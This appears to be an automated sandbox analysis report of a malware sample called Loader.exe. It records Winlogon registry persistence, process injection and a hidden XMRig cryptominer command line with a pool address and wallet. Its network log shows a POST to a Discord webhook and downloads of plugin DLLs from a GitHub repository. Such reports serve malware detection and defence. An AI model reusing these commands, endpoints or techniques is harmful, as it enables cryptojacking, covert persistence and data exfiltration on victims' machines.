Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
03/02/2023, 18:48 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20221111-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20220901-en
12 signatures
150 seconds
General
-
Target
Loader.exe
-
Size
1.6MB
-
MD5
a44e526804469076d712e8a05ddd7759
-
SHA1
7010fda540e70139020a7a79730e74e99bd8e6c9
-
SHA256
46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f
-
SHA512
04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36
-
SSDEEP
49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9
Score
10/10
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Google\\Chrome.exe\"," Loader.exe -
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/3776-146-0x0000000140344454-mapping.dmp xmrig behavioral2/memory/3776-145-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/3776-147-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/3776-148-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/3776-150-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/3776-152-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Loader.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4788 set thread context of 2292 4788 Loader.exe 88 PID 2292 set thread context of 3776 2292 MSBuild.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4388 powershell.exe 4388 powershell.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe 2292 MSBuild.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 4788 Loader.exe Token: SeDebugPrivilege 2292 MSBuild.exe Token: SeLockMemoryPrivilege 3776 AddInProcess.exe Token: SeLockMemoryPrivilege 3776 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3776 AddInProcess.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4788 wrote to memory of 4388 4788 Loader.exe 82 PID 4788 wrote to memory of 4388 4788 Loader.exe 82 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 4788 wrote to memory of 2292 4788 Loader.exe 88 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92 PID 2292 wrote to memory of 3776 2292 MSBuild.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RMHgF8iWWzutXCpbDgarftrSUoycmQgCqo.Worker_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3776
-
-
Network
-
Remote address:8.8.8.8:53Requestptb.discord.comIN AResponseptb.discord.comIN A162.159.136.232ptb.discord.comIN A162.159.137.232ptb.discord.comIN A162.159.135.232ptb.discord.comIN A162.159.128.233ptb.discord.comIN A162.159.138.232
-
Remote address:8.8.8.8:53Requestptb.discord.comIN A
-
POSThttps://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luyLoader.exeRemote address:162.159.136.232:443RequestPOST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ptb.discord.com
Content-Length: 202
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=92521944a3f311ed9de3aa7f43fb292e; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1675450205
x-ratelimit-reset-after: 1
Via: 1.1 google
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pL7SQtDT7gH4Lb0C9uxZNWQFaMALfpkDcVAXFNrgeHpyCZa%2B5G4gvG59Y%2B6bB0VAFfpWEVJ1qeKI2yy%2BjAuKrg7639CrB%2FUHQ1%2Bb11SGLe9gPsnztOg1LmaN9naytI33yA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __sdcfduid=92521944a3f311ed9de3aa7f43fb292e270c2dbfbf6ee9493aac91798c4c7ecdc5e20c5d7c5ad9b19e4545be8f365585; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=6105629be7006024db08d79af17898da8a1ce256-1675450204; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 793d59a16c001c9e-AMS
-
Remote address:8.8.8.8:53Request14.110.152.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.207.73.82
-
Remote address:20.207.73.82:443RequestGET /test93872/demo5/raw/main/plugin_3.dll HTTP/1.1
Host: github.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Fri, 03 Feb 2023 18:49:31 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C26F:2A6E:F06103:12E05B6:63DD5774
-
Remote address:20.207.73.82:443RequestGET /test93872/demo5/raw/main/plugin_4.dll HTTP/1.1
Host: github.com
ResponseHTTP/1.1 302 Found
Date: Fri, 03 Feb 2023 18:48:51 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C26F:2A6E:F061B4:12E06B4:63DD5779
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.108.133
-
Remote address:185.199.110.133:443RequestGET /test93872/demo5/main/plugin_3.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 2372653
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "988eccb86fa222930aee8203a6f29ad25b026c60ab99129b668cbd4e8ef39412"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: CE90:4761:21F1C:2A33A:63DD55A6
Accept-Ranges: bytes
Date: Fri, 03 Feb 2023 18:50:28 GMT
Via: 1.1 varnish
X-Served-By: cache-ams21070-AMS
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1675450228.415971,VS0,VE22
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 6771c13d1164bdd7492733544a76933c96f29571
Expires: Fri, 03 Feb 2023 18:55:28 GMT
Source-Age: 102
-
Remote address:185.199.110.133:443RequestGET /test93872/demo5/main/plugin_4.dll HTTP/1.1
Host: raw.githubusercontent.com
ResponseHTTP/1.1 200 OK
Content-Length: 37099
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "58a747ff1a171f0565a8909ab8adcac7763e62a5011998ec5b3daed1956393f9"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 692C:E376:E2DAAE:F21145:63DD55AC
Accept-Ranges: bytes
Date: Fri, 03 Feb 2023 18:50:33 GMT
Via: 1.1 varnish
X-Served-By: cache-ams21070-AMS
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1675450234.878578,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: f438c8fe8180c5f07c397cedf7e8c7bf52b59321
Expires: Fri, 03 Feb 2023 18:55:33 GMT
Source-Age: 102
-
Remote address:8.8.8.8:53Requestrx.unmineable.comIN AResponserx.unmineable.comIN CNAMErx.unminable.comrx.unminable.comIN CNAMErx-asia.unminable.comrx-asia.unminable.comIN CNAMErx-asia-sgp.unminable.comrx-asia-sgp.unminable.comIN A178.128.51.168
-
40 B 1
-
322 B 7
-
162.159.136.232:443https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luytls, httpLoader.exe1.2kB 4.6kB 9 9
HTTP Request
POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luyHTTP Response
204 -
322 B 7
-
322 B 7
-
322 B 7
-
442 B 592 B 7 6
-
981 B 8.2kB 11 10
HTTP Request
GET https://github.com/test93872/demo5/raw/main/plugin_3.dllHTTP Response
302HTTP Request
GET https://github.com/test93872/demo5/raw/main/plugin_4.dllHTTP Response
302 -
185.199.110.133:443https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dlltls, httpMSBuild.exe51.5kB 2.5MB 1018 1791
HTTP Request
GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dllHTTP Response
200HTTP Request
GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dllHTTP Response
200 -
322 B 7
-
1.1kB 2.0kB 9 8
-
322 B 7
-
122 B 141 B 2 1
DNS Request
ptb.discord.com
DNS Request
ptb.discord.com
DNS Response
162.159.136.232162.159.137.232162.159.135.232162.159.128.233162.159.138.232
-
72 B 146 B 1 1
DNS Request
14.110.152.52.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
20.207.73.82
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.110.133185.199.111.133185.199.109.133185.199.108.133
-
63 B 154 B 1 1
DNS Request
rx.unmineable.com
DNS Response
178.128.51.168